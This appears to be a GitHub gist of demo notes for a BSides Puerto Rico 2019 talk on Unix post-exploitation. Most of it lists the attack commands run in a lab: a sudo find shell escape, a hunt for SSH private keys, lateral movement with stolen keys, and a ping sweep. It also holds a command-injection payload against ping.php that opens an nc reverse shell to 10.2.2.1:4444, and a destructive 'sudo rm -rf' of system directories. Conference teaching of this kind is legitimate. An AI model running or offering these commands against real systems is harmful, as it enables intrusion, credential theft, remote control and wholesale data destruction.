Last active
October 12, 2019 14:23
-
-
Save magisterquis/4db14e6a4f56313ba7091c4151f6e528 to your computer and use it in GitHub Desktop.
Notes and links for "Unix Admins, Go H4x0r!" demo, BSides Puerto Rico 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Link to the slides: https://docs.google.com/presentation/d/1D5_68h5EgEYCRDh_gpVRUc22xazUf5s0u7wBK_C8zkQ | |
| Speakers' twitter handles: @fin_ack (Fernando) | |
| @magisterquis (Stuart) | |
| Commands executed during the demo: | |
| ssh -v joe@10.1.1.5 | |
| ps awwwfux | |
| egrep -A1 '^[sudo]{4}' .*history | |
| sudo -l | |
| sudo find /etc/hosts -exec sh \; | |
| id | |
| find / -type f -name id_rsa -exec ls -alrtd {} + | |
| for i in {1..6}; do | |
| ssh -F /dev/null \ | |
| -o StrictHostKeyChecking=no \ | |
| -o ConnectTimeout=3 \ | |
| -o BatchMode=yes \ | |
| -i /home/jack/.ssh/id_rsa \ | |
| jack@10.1.1.$i uname -a && | |
| echo $i; | |
| done | |
| ssh -i /home/jack/.ssh/id_rsa jack@10.1.1.1 | |
| ps auxwww | |
| arp -an | |
| for i in `jot 255`; do ping -c 2 10.2.2.$i & sleep .1; done >/dev/null 2>&1 | |
| arp -an | grep -v incomplete | |
| curl --data-urlencode 'ip=10.2.2.1' 10.2.2.7:8080/ping.php | |
| ( | |
| sleep 20 && | |
| curl \ | |
| --data-urlencode 'ip=127.0.0.1; | |
| rm .f; | |
| mkfifo .f; | |
| nc -nv 10.2.2.1 4444 < .f | sh >.f 2>&1 &' \ | |
| 10.2.2.7:8080/ping.php | |
| ) & | |
| nc -nvl 4444 | |
| uname -a | |
| ps awwwfux | |
| id | |
| sudo -S -l | |
| ls / | |
| sudo rm -rf /bin /etc /home /lib* /opt /sbin /srv /usr /var && w | |
| Asciinema recording of the demo: https://asciinema.org/a/272672 | |
| Vulnerable program used in the demo: https://github.com/magisterquis/pinginject |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment